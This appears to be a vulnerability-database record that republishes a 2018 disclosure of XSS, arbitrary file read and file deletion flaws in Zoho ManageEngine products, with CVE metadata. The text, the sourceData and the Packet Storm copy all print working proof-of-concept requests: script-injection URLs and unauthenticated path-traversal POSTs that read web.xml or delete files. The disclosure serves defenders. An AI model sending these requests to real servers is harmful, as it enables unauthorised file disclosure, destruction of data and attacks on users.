ID 1337DAY-ID-30757 Type zdt Reporter Xiaotian Wang Modified 2018-07-23T00:00:00
Description
Exploit for php platform in category web applications
This issue has been reported to the vendor who has already published patches for this issue.
https://www.manageengine.com/products/applications_manager/issues.html
==========================
Advisory: Zoho manageengine Applications Manager Reflected XSS Vulnerability
Author: M3 From DBAppSecurity
Affected Version: All
==========================
Proof of Concept:
==========================
/GraphicalView.do?method=createBusinessService"scriptalert(5045)/script
Notice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue.
http://opmanager.helpdocsonline.com/read-me
==========================
Advisory:Zoho manageengine Arbitrary File Read in multiple Products
Author: M3 From DBAppSecurity
Affected Products:
Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer
==========================
Proof of Concept:
==========================
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx
Notice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue.
==========================
Advisory: Zoho manageengine Desktop Central Arbitrary File Deletion
Author: M3 From DBAppSecurity
Affected Products:Desktop Central
==========================
Proof of Concept:
==========================
POST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif
Notice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue.
http://opmanager.helpdocsonline.com/read-me
==========================
Advisory: Zoho manageengine Reflected XSS in multiple Products
Author: M3 From DBAppSecurity
Affected Products:
Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer
==========================
Proof of Concept:
==========================
/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script
Notice: This vul can reproduce without login.
# 0day.today [2018-07-23] #
{"id": "1337DAY-ID-30757", "bulletinFamily": "exploit", "title": "Zoho ManageEngine 13 (13790 build) XSS / File Read / File Deletion Vulnerabilities", "description": "Exploit for php platform in category web applications", "published": "2018-07-23T00:00:00", "modified": "2018-07-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/30757", "reporter": "Xiaotian Wang", "references": [], "cvelist": ["CVE-2018-12996", "CVE-2018-12999", "CVE-2018-12998", "CVE-2018-12997"], "type": "zdt", "lastseen": "2018-07-23T14:14:14", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "8101e0db5ba9e3a2df0ac7a213cb99da"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "6609a40b44f81ab440bb83f570043807"}, {"key": "modified", "hash": "1ad2debff0a1d37bfcf893d60e26f203"}, {"key": "published", "hash": "1ad2debff0a1d37bfcf893d60e26f203"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "fb1851cc2f4b9dc34262d9cd90f4503b"}, {"key": "sourceData", "hash": "11459f9f8a2779c1e39cc6958eb052b9"}, {"key": "sourceHref", "hash": "f13333e62be42ead158e7d803321dd3f"}, {"key": "title", "hash": "1abefaac5bc9f42d27f3df417dc9279d"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "ec4ace161fb990d8423f78352902c9b664f57be64fa76bbd90691f8a6da71661", "viewCount": 16, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2018-07-23T14:14:14"}, "vulnersScore": 4.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/30757", "sourceData": "This issue has been reported to the vendor who has already published patches for this issue.\r\nhttps://www.manageengine.com/products/applications_manager/issues.html\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Applications Manager Reflected XSS Vulnerability\r\nAuthor: M3 From DBAppSecurity\r\nAffected Version: All\r\n==========================\r\nProof of Concept:\r\n==========================\r\n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script\r\n\r\n\r\nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue.\r\nhttp://opmanager.helpdocsonline.com/read-me\r\n\r\n\r\n==========================\r\nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:\r\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\r\n==========================\r\nProof of Concept:\r\n==========================\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx\r\n\r\n\r\nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue.\r\n\r\n\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:Desktop Central\r\n==========================\r\nProof of Concept:\r\n==========================\r\n\r\n\r\nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif\r\n\r\n\r\nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue.\r\nhttp://opmanager.helpdocsonline.com/read-me\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Reflected XSS in multiple Products\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:\r\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\r\n==========================\r\nProof of Concept:\r\n==========================\r\n/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script\r\n\r\n\r\nNotice: This vul can reproduce without login.\n\n# 0day.today [2018-07-23] #"}
{"result": {"cve": [{"lastseen": "2018-08-07T10:54:43", "references": ["https://github.com/unh3x/just4cve/issues/7", "https://www.manageengine.com/products/applications_manager/security-updates/security-updates-cve-2018-12996.html", "https://www.manageengine.com/products/applications_manager/issues.html", "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html", "http://seclists.org/fulldisclosure/2018/Jul/71", "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-038"], "description": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Applications Manager before 13 (Build 13800) allows remote attackers to inject arbitrary web script or HTML via the parameter 'method' to GraphicalView.do.", "edition": 4, "reporter": "NVD", "published": "2018-06-29T08:29:00", "title": "CVE-2018-12996", "type": "cve", "enchantments": {"score": {"modified": "2018-08-07T10:54:43", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-12996"], "scanner": [], "modified": "2018-08-06T21:29:02", "cpe": [], "id": "CVE-2018-12996", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12996", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-25T10:56:17", "references": ["http://seclists.org/fulldisclosure/2018/Jul/74", "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-035", "https://github.com/unh3x/just4cve/issues/9", "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"], "description": "Incorrect Access Control in AgentTrayIconServlet in Zoho ManageEngine Desktop Central 10.0.255 allows attackers to delete certain files on the web server without login by sending a specially crafted request to the server with a computerName=../ substring to the /agenttrayicon URI.", "edition": 3, "reporter": "NVD", "published": "2018-06-29T08:29:00", "title": "CVE-2018-12999", "type": "cve", "enchantments": {"score": {"modified": "2018-07-25T10:56:17", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-12999"], "scanner": [], "modified": "2018-07-24T21:29:01", "cpe": [], "id": "CVE-2018-12999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12999", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-25T10:56:17", "references": ["https://github.com/unh3x/just4cve/issues/10", "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036", "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html", "http://seclists.org/fulldisclosure/2018/Jul/75"], "description": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.", "edition": 3, "reporter": "NVD", "published": "2018-06-29T08:29:00", "title": "CVE-2018-12998", "type": "cve", "enchantments": {"score": {"modified": "2018-07-25T10:56:17", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-12998"], "scanner": [], "modified": "2018-07-24T21:29:00", "cpe": [], "id": "CVE-2018-12998", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12998", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-25T10:56:17", "references": ["http://seclists.org/fulldisclosure/2018/Jul/73", "https://github.com/unh3x/just4cve/issues/8", "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-037", "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"], "description": "Incorrect Access Control in FailOverHelperServlet in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows attackers to read certain files on the web server without login by sending a specially crafted request to the server with the operation=copyfile&fileName= substring.", "edition": 3, "reporter": "NVD", "published": "2018-06-29T08:29:00", "title": "CVE-2018-12997", "type": "cve", "enchantments": {"score": {"modified": "2018-07-25T10:56:17", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-12997"], "scanner": [], "modified": "2018-07-24T21:29:00", "cpe": [], "id": "CVE-2018-12997", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12997", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-07-23T01:54:10", "references": [], "description": "", "edition": 1, "reporter": "Xiaotian Wang", "published": "2018-07-22T00:00:00", "title": "Zoho ManageEngine 13 (13790 build) XSS / File Read / File Deletion", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-07-23T01:54:10", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-12996", "CVE-2018-12999", "CVE-2018-12998", "CVE-2018-12997"], "modified": "2018-07-22T00:00:00", "id": "PACKETSTORM:148635", "href": "https://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html", "sourceData": "`This issue has been reported to the vendor who has already published patches for this issue. \nhttps://www.manageengine.com/products/applications_manager/issues.html \n \n \n========================== \nAdvisory:Zoho manageengine Applications Manager Reflected XSSVulnerability \nAuthor: M3 From DBAppSecurity \nAffected Version: All \n========================== \nProof of Concept: \n========================== \n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script \n \n \nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me \n \n \n========================== \nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products \nAuthor: M3 From DBAppSecurity \nAffected Products: \nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer \n========================== \nProof of Concept: \n========================== \nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx \n \n \nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. \n \n \n \n \n========================== \nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion \nAuthor: M3 From DBAppSecurity \nAffected Products:Desktop Central \n========================== \nProof of Concept: \n========================== \n \n \nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif \n \n \nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me \n \n \n========================== \nAdvisory: Zoho manageengine Reflected XSS in multiple Products \nAuthor: M3 From DBAppSecurity \nAffected Products: \nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer \n========================== \nProof of Concept: \n========================== \n/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script \n \n \nNotice: This vul can reproduce without login. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148635/zohome-xssfile.txt"}]}}
